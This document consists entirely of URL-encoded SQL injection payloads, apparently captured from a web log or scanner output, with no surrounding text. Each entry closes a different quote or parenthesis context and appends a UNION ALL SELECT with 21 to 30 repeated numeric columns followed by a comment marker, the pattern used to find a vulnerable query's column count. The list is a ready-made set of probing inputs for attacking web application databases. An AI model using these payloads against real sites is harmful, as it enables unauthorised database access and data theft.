-5205%22%29%29%29%20UNION%20ALL%20SELECT%208667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667--%20 -5594%22%29%29%29%20UNION%20ALL%20SELECT%208776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776--%20 -4663%22%29%29%29%20UNION%20ALL%20SELECT%207214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214--%20 -2268%22%29%29%29%20UNION%20ALL%20SELECT%209012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012--%20 -4413%22%29%29%29%20UNION%20ALL%20SELECT%205630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630--%20 -9692%22%29%29%29%20UNION%20ALL%20SELECT%201353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353--%20 -8282%22%29%29%29%20UNION%20ALL%20SELECT%201535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535--%20 -6726%22%20UNION%20ALL%20SELECT%205710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710--%20 -3542%22%20UNION%20ALL%20SELECT%205849%2C5849%2C5849%2C5849%2C5849%2C5849%2C5849%2C5849%2C5849%2C5849%2C5849%2C5849%2C5849%2C5849%2C5849%2C5849%2C5849%2C5849%2C5849%2C5849%2C5849%2C5849--%20 -2949%22%20UNION%20ALL%20SELECT%207107%2C7107%2C7107%2C7107%2C7107%2C7107%2C7107%2C7107%2C7107%2C7107%2C7107%2C7107%2C7107%2C7107%2C7107%2C7107%2C7107%2C7107%2C7107%2C7107%2C7107%2C7107%2C7107--%20 -2554%22%20UNION%20ALL%20SELECT%204386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386--%20 -7014%22%20UNION%20ALL%20SELECT%203643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643%2C3643--%20 -1699%22%20UNION%20ALL%20SELECT%209776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776%2C9776--%20 -8271%22%20UNION%20ALL%20SELECT%203573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573%2C3573--%20 -2705%22%20UNION%20ALL%20SELECT%201223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223--%20 -8959%22%20UNION%20ALL%20SELECT%204719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719%2C4719--%20 -3729%22%20UNION%20ALL%20SELECT%202551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551%2C2551--%20 -8511%22%29%20UNION%20ALL%20SELECT%201862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862--%20 -8791%22%29%20UNION%20ALL%20SELECT%204836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836--%20 -3800%22%29%20UNION%20ALL%20SELECT%203314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314--%20 -5067%22%29%20UNION%20ALL%20SELECT%202647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647--%20 -5494%22%29%20UNION%20ALL%20SELECT%204682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682--%20 -9340%22%29%20UNION%20ALL%20SELECT%209402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402--%20 -3129%22%29%20UNION%20ALL%20SELECT%205263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263--%20 -3604%22%29%20UNION%20ALL%20SELECT%208630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630%2C8630--%20 -4678%22%29%20UNION%20ALL%20SELECT%206097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097--%20 -5212%22%29%20UNION%20ALL%20SELECT%205424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424%2C5424--%20 -9201%22%29%29%20UNION%20ALL%20SELECT%203372%2C3372%2C3372%2C3372%2C3372%2C3372%2C3372%2C3372%2C3372%2C3372%2C3372%2C3372%2C3372%2C3372%2C3372%2C3372%2C3372%2C3372%2C3372%2C3372%2C3372--%20 -8160%22%29%29%20UNION%20ALL%20SELECT%203647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647--%20 -8689%22%29%29%20UNION%20ALL%20SELECT%207304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304--%20 -9643%22%29%29%20UNION%20ALL%20SELECT%207105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105--%20 -2504%22%29%29%20UNION%20ALL%20SELECT%204045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045--%20 -3461%22%29%29%20UNION%20ALL%20SELECT%209646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646--%20 -3613%22%29%29%20UNION%20ALL%20SELECT%204851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851--%20 -9277%22%29%29%20UNION%20ALL%20SELECT%208185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185%2C8185--%20 -5520%22%29%29%20UNION%20ALL%20SELECT%203387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387--%20 -2699%22%29%29%20UNION%20ALL%20SELECT%201756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756--%20 -1565%22%29%29%29%20UNION%20ALL%20SELECT%202254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254--%20 -1741%22%29%29%29%20UNION%20ALL%20SELECT%205805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805%2C5805--%20 -3879%22%29%29%29%20UNION%20ALL%20SELECT%206358%2C6358%2C6358%2C6358%2C6358%2C6358%2C6358%2C6358%2C6358%2C6358%2C6358%2C6358%2C6358%2C6358%2C6358%2C6358%2C6358%2C6358%2C6358%2C6358%2C6358%2C6358%2C6358--%20 -3839%22%29%29%29%20UNION%20ALL%20SELECT%204061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061--%20 -3179%22%29%29%29%20UNION%20ALL%20SELECT%204259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259--%20 -8295%22%29%29%29%20UNION%20ALL%20SELECT%206918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918--%20 -7533%22%29%29%29%20UNION%20ALL%20SELECT%204917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917%2C4917--%20 -1067%22%29%29%29%20UNION%20ALL%20SELECT%207527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527--%20 -3490%22%29%29%29%20UNION%20ALL%20SELECT%202653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653--%20 -4113%22%29%29%29%20UNION%20ALL%20SELECT%205646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646%2C5646--%20 -8212%22%20UNION%20ALL%20SELECT%203841%2C3841%2C3841%2C3841%2C3841%2C3841%2C3841%2C3841%2C3841%2C3841%2C3841%2C3841%2C3841%2C3841%2C3841%2C3841%2C3841%2C3841%2C3841%2C3841%2C3841--%20 -9079%22%20UNION%20ALL%20SELECT%205262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262--%20 -1274%22%20UNION%20ALL%20SELECT%206950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950--%20 -5849%22%20UNION%20ALL%20SELECT%204715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715%2C4715--%20 -2246%22%20UNION%20ALL%20SELECT%202659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659--%20 -8254%22%20UNION%20ALL%20SELECT%205531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531--%20 -6421%22%20UNION%20ALL%20SELECT%205924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924--%20 -7529%22%20UNION%20ALL%20SELECT%202915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915--%20 -3243%22%20UNION%20ALL%20SELECT%207946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946%2C7946--%20 -9155%22%20UNION%20ALL%20SELECT%209286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286--%20 -5141%25%27%29%20UNION%20ALL%20SELECT%207757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757--%20 -3267%25%27%29%20UNION%20ALL%20SELECT%205352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352--%20 -5718%25%27%29%20UNION%20ALL%20SELECT%204538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538--%20 -4094%25%27%29%20UNION%20ALL%20SELECT%209042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042--%20 -8213%25%27%29%20UNION%20ALL%20SELECT%208159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159--%20 -8395%25%27%29%20UNION%20ALL%20SELECT%209142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142%2C9142--%20 -7733%25%27%29%20UNION%20ALL%20SELECT%206756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756--%20 -5294%25%27%29%20UNION%20ALL%20SELECT%204756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756--%20 -7895%25%27%29%20UNION%20ALL%20SELECT%203238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238%2C3238--%20 -5057%25%27%29%20UNION%20ALL%20SELECT%209916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916--%20 -4609%25%27%29%29%20UNION%20ALL%20SELECT%201367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367--%20 -3228%25%27%29%29%20UNION%20ALL%20SELECT%209351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351--%20 -7326%25%27%29%29%20UNION%20ALL%20SELECT%205485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485--%20 -3709%25%27%29%29%20UNION%20ALL%20SELECT%201750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750--%20 -3704%25%27%29%29%20UNION%20ALL%20SELECT%205607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607--%20 -6426%25%27%29%29%20UNION%20ALL%20SELECT%203007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007--%20 -9934%25%27%29%29%20UNION%20ALL%20SELECT%206413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413%2C6413--%20 -7250%25%27%29%29%20UNION%20ALL%20SELECT%209697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697%2C9697--%20 -5281%25%27%29%29%20UNION%20ALL%20SELECT%202677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677%2C2677--%20 -6391%25%27%29%29%20UNION%20ALL%20SELECT%206649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649%2C6649--%20 -9208%25%27%29%29%29%20UNION%20ALL%20SELECT%201644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644--%20 -4812%25%27%29%29%29%20UNION%20ALL%20SELECT%207365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365--%20 -2657%25%27%29%29%29%20UNION%20ALL%20SELECT%201492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492--%20 -7036%25%27%29%29%29%20UNION%20ALL%20SELECT%205899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899--%20 -2388%25%27%29%29%29%20UNION%20ALL%20SELECT%208805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805--%20 -7946%25%27%29%29%29%20UNION%20ALL%20SELECT%203946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946%2C3946--%20 -5161%25%27%29%29%29%20UNION%20ALL%20SELECT%206843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843--%20 -3313%25%27%29%29%29%20UNION%20ALL%20SELECT%208761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761%2C8761--%20 -3385%25%27%29%29%29%20UNION%20ALL%20SELECT%207346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346--%20 -7399%25%27%29%29%29%20UNION%20ALL%20SELECT%206164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164--%20 -8176%25%27%20UNION%20ALL%20SELECT%207659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659--%20 -8919%25%27%20UNION%20ALL%20SELECT%202353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353--%20 -5438%25%27%20UNION%20ALL%20SELECT%207556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556--%20 -3977%25%27%20UNION%20ALL%20SELECT%204278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278--%20 -8957%25%27%20UNION%20ALL%20SELECT%204738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738%2C4738--%20 -9586%25%27%20UNION%20ALL%20SELECT%202928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928--%20 -7128%25%27%20UNION%20ALL%20SELECT%204453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453--%20 -2839%25%27%20UNION%20ALL%20SELECT%207274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274%2C7274--%20 -8211%25%27%20UNION%20ALL%20SELECT%206436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436--%20 